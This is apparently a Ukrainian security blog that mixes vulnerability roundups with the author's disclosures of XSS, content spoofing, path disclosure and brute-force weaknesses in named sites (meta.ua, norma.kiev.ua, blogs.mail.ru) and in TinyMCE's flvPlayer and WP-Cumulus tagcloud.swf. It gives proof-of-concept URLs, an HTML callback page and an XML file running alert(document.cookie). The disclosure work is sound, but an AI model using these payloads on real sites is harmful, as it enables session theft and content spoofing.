Websecurity - Веб безпека

В даній добірці уразливості в веб додатках:

• radvd security update (деталі)
• XSRF (CSRF) in PHPDug (деталі)
• Multiple SQL injection vulnerabilities in PHPDug (деталі)
• Nova vulnerability (деталі)
• Multiple XSS vulnerabilities in PHPDug (деталі)
• YaTFTPSvr TFTP Server Directory Traversal Vulnerability (деталі)
• CSRF (Cross-Site Request Forgery) in VCalendar (деталі)
• RSA, The Security Division of EMC, announces the release of Hotfix 6 with security updates for RSA Key Manager Appliance 2.7 Service Pack 1 (деталі)
• XSRF (CSRF) in poMMo (деталі)
• Multiple XSS (Cross Site Scripting) vulnerabilities in poMMo (деталі)

26.10.2007

У травні, 19.05.2007, я знайшов Cross-Site Scripting та Insufficient Anti-automation уразливості на проекті http://meta.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Останнього разу стосовно проектів компанії Мета я писав про уразливості на info.meta.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

24.11.2011

XSS:

POST запит на сторінці http://meta.ua/meta/feedback.asp в полях: Ваше имя, E-mail, Адрес сайта, Телефон для связи, Ваше сообщение.

Insufficient Anti-automation:

http://meta.ua/meta/feedback.asp

Відправка автоматизованих POST запитів на сторінці http://meta.ua/meta/feedback.asp можлива незважаючи на захист з використанням випадкових імен полів. Даний захист обходиться за допомогою використання постійних імен полів (ті ж самі імена використовуються для багаторазової відправки запитів).

Дані уразливості були проігноровані й не виправлені (причому відповіли мені дуже несерйозним чином, після чого я більше не сповіщаю Мету про дірки на їхніх сайтах). І лише зараз дані XSS уразливості вже виправлені, причому вони розбили форму зворотнього зв’язку на три (що вибираються вказанням параметра mode), а також зробили ще окрему форму з капчею. При цьому IAA уразливість в цій формі досі не виправлена.

В даній добірці уразливості в веб додатках:

• Cisco Unified Contact Center Express Directory Traversal Vulnerability (деталі)
• XSS in CLASSIFIED ADS (деталі)
• Path disclousure in MEGA PORTAL (деталі)
• Cisco Unified Communications Manager Directory Traversal Vulnerability (деталі)
• otrs2 security update (деталі)
• Disclosure of sensitive information in D-Link DIR-300 Router (деталі)
• Multiple XSS and Authentication flaws within BMC Remedy Knowledge Management (деталі)
• XSS in PHP Directory Listing Script (деталі)
• Arbitrary file reading and arbitrary code execution in Router Manager for D-Link DIR-300 (деталі)
• XSS in AJAX Calendar (деталі)

17.10.2011

Нещодавно, 15.10.2011, я знайшов численні уразливості в TinyMCE - популярному візуальному редакторі, та flvPlayer (що входить в поставку TinyMCE). Це Full path disclosure, Content Spoofing та Cross-Site Scripting уразливості. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про виконання коду в TinyBrowser, коли через даний компонент TinyMCE можна було провести Code Execution атаку. А цього разу я знайшов нові дірки в TinyMCE.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб додатку.

23.11.2011

Full path disclosure:

Уразливості в TinyMCE в плагіні spellchecker.

http://site/path/tinymce/plugins/spellchecker/classes/EnchantSpell.php

http://site/path/tinymce/plugins/spellchecker/classes/GoogleSpell.php

http://site/path/tinymce/plugins/spellchecker/classes/PSpell.php

http://site/path/tinymce/plugins/spellchecker/classes/PSpellShell.php

Content Spoofing:

flv_player.swf - це flvPlayer v1.0b, що входить в TinyMCE.

Для WordPress:
http://site/wp-includes/js/tinymce/plugins/media/img/flv_player.swf

Для Simple:Press Forum: http://site/wp-content/plugins/
simple-forum/editors/tinymce/plugins/img/media/flv_player.swf

Для RoundCube:
http://site/program/js/tiny_mce/plugins/media/img/flv_player.swf

Можна вказувати абсолютні URL для включення зовнішніх файлів в флешку на цільовому сайті.

http://site/flv_player.swf?flvToPlay=http://site2/1.flv
http://site/flv_player.swf?autoStart=false&startImage=http://site2/1.jpg
http://site/flv_player.swf?flvToPlay=http://site2/1.flv&autoStart=false&startImage=http://site2/1.jpg
http://site/flv_player.swf?flvToPlay=http://site2/1.xml

Через xml-файл, розміщений на поточному чи зовнішньому ресурсі, можна вказувати абсолютні URL для включення зовнішніх файлів в флешку на цільовому сайті (параметри thumbnail та url в xml-файлі приймають довільні адреси).

Файл 1.xml:

<?xml version="1.0" encoding="UTF-8"?>
<playlist>
	<item name="Content Spoofing" thumbnail="1.jpg" url="1.flv"/>
	<item name="Content Spoofing" thumbnail="2.jpg" url="2.flv"/>
</playlist>

XSS:

<html>
<body>
<script>
function flvStart() {
	alert('XSS');
}
function flvEnd() {
	alert('XSS');
}
</script>
<object width="50%" height="50%">
<param name=movie value="flv_player.swf?flvToPlay=1.flv&jsCallback=true">
<param name=quality value=high>
<embed src="flv_player.swf?flvToPlay=1.flv&jsCallback=true" width="50%" height="50%" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash"></embed>
</object>
</body>
</html>

Якщо на сайті на сторінці з flv_player.swf (з параметром jsCallback=true, або якщо є можливість вказати цей параметр для flv_player.swf) є можливість включити JS код з функцією flvStart() і/або flvEnd() (через HTML Injection), то можна провести XSS атаку. Тобто JS-калбеки можна використати для XSS атаки.

Починаючи з TinyMCE 3.4b2, в поставку входить moxieplayer.swf.

Content Spoofing:

http://site/path/moxieplayer.swf?url=http://site2/1.flv

Можна вказувати абсолютні URL для включення зовнішніх файлів в флешку на цільовому сайті.

Уразливі всі версії TinyMCE, що містять вищеназвані файли. Уразливі до CS та XSS всі версії flvPlayer (flvPlayer v1.0b). А також всі веб додатки, які використовують дані версії TinyMCE та flvPlayer, а це сотні веб додатків та десятки мільйонів сайтів в Інтернеті. Сайтів лише на одному WordPress, за даними wordpress.com, на даний час налічує більше 67 мільйонів, біля половини з яких розміщується на блог-хостінгу wordpress.com.

Зокрема вразливі наступні веб додатки: WordPress 2.6 - 3.1.1 (що я перевірив, а потенційно WP 2.5 - 3.2.1) до FPD. До Content Spoofing вразливі версії з файлом flv_player.swf (в плагіні media в TinyMCE), що є в WP 2.6 - 3.0.1 (що я перевірив, а потенційно WP 2.5 - 3.0.5). Simple:Press Forum 4.4.5 та попередні версії. RoundCube 0.6 та попередні версії (перевірялося в 0.4-beta та 0.6) до СS і XSS. В останній версії RoundCube 0.6 використовує moxieplayer.swf (замість flv_player.swf). Та багато інших веб додатків.

В даній добірці уразливості в веб додатках:

• Multiple vulnerabilities in OmniTouch Instant Communication Suite (деталі)
• XSS in (e)2 interactive Photo Gallery (деталі)
• Multiple SQL Injection in Shutter (деталі)
• HP Network Node Manager i (NNMi) for HP-UX, Linux, Solaris, and Windows, Remote Unauthorized Disclosure of Information (деталі)
• CSRF (Cross-Site Request Forgery) in SelectaPix Image Gallery (деталі)
• Cisco CUCM - Multiple Vulnerabilities (деталі)
• Multiple XSS in YaPiG (деталі)
• XSS in SelectaPix Image Gallery (деталі)
• Cisco Unified Contact Center Express Directory Traversal (деталі)
• CSRF (Cross-Site Request Forgery) in FREELANCER (деталі)

29.09.2011

У вересні, 15.09.2011, я знайшов Cross-Site Scripting, Full path disclosure та Brute Force уразливості на сайті http://norma.kiev.ua (онлайн магазин). Про що найближчим часом сповіщу адміністрацію сайта.

Стосовно дірок на сайтах онлайн магазинів в останнє я писав про уразливість на citycom.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

19.11.2011

XSS:

• alert(document.cookie)

Дана уразливість вже виправлена. Але неякісно і захист легко обходиться:

XSS (з MouseOverJacking):

• alert(document.cookie)
• цікавий

Full path disclosure:

http://norma.kiev.ua/inc/subscribe.php

Brute Force:

http://norma.kiev.ua/adm/

Якщо FPD вже виправлена, то XSS і BF все ще не виправлені.

В даній добірці уразливості в веб додатках:

• Toshiba eStudio Multifunction Printer Information Leakage (деталі)
• Multiple XSS vulnerabilities in BackupPC (деталі)
• CSRF (Cross-Site Request Forgery) in phpGraphy (деталі)
• Toshiba eStudio Multifunction Printer Authentication Bypass (деталі)
• XSS in phpGraphy (деталі)
• zFtp Server <= 2011-04-13 | "STAT,CWD" Remote Denial of Service Vulnerability (деталі)
• XSS in GOT.MY CLASSMATES (деталі)
• SQL injection in 4images (деталі)
• Denial of Service vulnerability in cyrus-imapd (деталі)
• XSS in DEAL INFORMER (деталі)

Сьогодні я знайшов Cross-Site Scripting уразливість на http://blogs.mail.ru. Раніше я вже знаходив уразливості на сайтах Mail.ru і це чергова дірка. Про що найближчим часом сповіщу адміністрацію проекту.

Останній раз стосовно проектів mail.ru я писав про уразливість на gogo.ru та редиректор на rb.mail.ru.

XSS:

• alert(document.cookie)
• html включення

Код виконається при кліку. Це Strictly social XSS. Також можна провести HTML Injection атаку, подібно до WP-Cumulus.

Це уразливість в WP-Cumulus, який використовується на даному сайті. Про мільйони флешек tagcloud.swf вразливих до XSS атак я згадував у своїй статті XSS уразливості в 34 мільйонах флеш файлах.

Атака можлива лише через параметр mode, але не через xmlpath (тому що використовується стара версія swf-файла).

В даній добірці уразливості в веб додатках:

• HP Onboard Administrator (OA), Remote Unauthorized Access (деталі)
• Path disclosure in Cotonti (деталі)
• Multiple vulnerabilities in python-feedparser (деталі)
• Denial of Service in OpenSSL (деталі)
• spip security update (деталі)
• CRL validation bypass in OpenSSL (деталі)
• LANSA aXes Web Terminal (TN5250) Cross-Site Scripting Vulnerability (деталі)
• Cisco Show and Share Security Vulnerabilities (деталі)
• MediaCast Password Dump Vulnerability (деталі)
• SAP Enterprise Portal Path Disclosure (деталі)

Раніше я вже писав про XSS уразливість в WP-Cumulus для WordPress та багатьох інших плагінах (а також віджетах і темах) для різних движків, що використовують tagcloud.swf розроблений автором WP-Cumulus. Про мільйони флешек tagcloud.swf вразливих до XSS атак я згадував у своїй статті XSS уразливості в 34 мільйонах флеш файлах.

В листопаді, 09.11.2011 (через три роки після оприлюднення попередньої уразливості), я знайшов нову Cross-Site Scripting уразливість в WP-Cumulus для WordPress. Знайшов її на одному е-комерс сайті. Що також має місце в багатьох інших веб додатках та мільйонах сайтів. Про що найближчим часом повідомлю розробнику WP-Cumulus. Якщо попередня уразливість стосувалася параметра mode, то нова - параметра xmlpath.

XSS:

http://site/tagcloud.swf?xmlpath=xss.xml
http://site/tagcloud.swf?xmlpath=http://site/xss.xml

Файл xss.xml:

<tags>
<a href="javascript:alert(document.cookie)" style="font-size:+40pt">Click me</a>
<a href="http://websecurity.com.ua" style="font-size:+40pt">Click me</a>
</tags>

Код виконається при кліку. Це Strictly social XSS. Також можна провести HTML Injection атаку, подібно до WP-Cumulus.

Атака спрацює лише у нових версіях флешки, де додали підтримку параметра xmlpath. В старих версіях (невразливих) в контекстному меню вказано “WP-Cumulus by Roy Tanck”, а в нових версіях (вразливих) вказано “WP-Cumulus by Roy Tanck and Luke Morton”. Атака спрацює лише коли xml-файл розміщений на цьому самому сайті (шлях може бути вказаний як відносний, так і абсолютний). Розширення файла може бути довільне.

При цьому патч Роя (версія флешки для WP-Cumulus 1.23) спрацьовує і для даної уразливості, тому в пропатчених версіях флешки XSS вже не спрацює, тільки HTML Injection.

Уразливі всі версії WP-Cumulus для WordPress. Та повинні бути уразливими Joomulus для Joomla, JVClouds3D для Joomla, Blogumus, 3D Cloud для Joomla, Tagcloud для DLE, t3m_cumulus_tagcloud для TYPO3, Cumulus для BlogEngine.NET, tagcloud для Kasseler CMS, 3D user cloud для Joomla, Flash Tag Cloud для Blogsa та інших ASP.NET движків, b-cumulus, Cumulus для Drupal, sfWpCumulusPlugin для symfony, Flash Tag Cloud For MT 4, MT-Cumulus для Movable Type, Tumulus для Typepad, WP-Cumulus для RapidWeaver, HB-Cumulus для Habari, Cumulus для DasBlog, EZcumulus та eZ Flash Tag Cloud для eZ Publish, Simple Tags для Expression Engine (версія 1.6.3 і нові версії, де була додана підтримка даного swf-файла), Freetag для Serendipity (підтримка флеш-файла була додана в версії 2.103), Tag cloud для Social Web CMS, Animated tag cloud для PHP-Fusion, 3D Advanced Tags Clouds для Magento, Cumulus для Sweetcron та інші веб додатки з цією флешкою.

А також теми для движків, зокрема для Drupal, що використовують цю флешку (про п’ять вразливих тем до Drupal я писав раніше). Як я зазначив вище, вразливі лише веб додатки з новими версіями цього флеш-файла (і багато веб додатків та сайтів використовують саме нові версії флешки).